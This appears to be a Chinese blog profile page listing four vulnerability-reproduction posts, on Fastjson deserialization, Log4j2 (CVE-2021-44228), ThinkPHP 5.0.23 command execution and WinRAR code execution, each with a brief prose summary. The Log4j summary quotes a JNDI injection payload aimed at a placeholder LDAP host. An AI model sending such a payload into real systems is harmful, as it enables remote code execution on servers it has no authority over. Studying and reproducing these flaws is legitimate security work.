- 博客(4)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Fastjson 反序列化漏洞
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
2024-01-09 10:51:17
1537
1
原创 CVE-2021-44228 Log4j2漏洞复现
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
2024-01-07 22:33:29
1587
原创 Thinkphp5.0.23远程命令执行
thinkphp远程命令执行漏洞php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
2024-01-03 16:43:21
1662
原创 WinRAR代码执行漏洞复现
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
2024-01-02 14:49:36
983
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人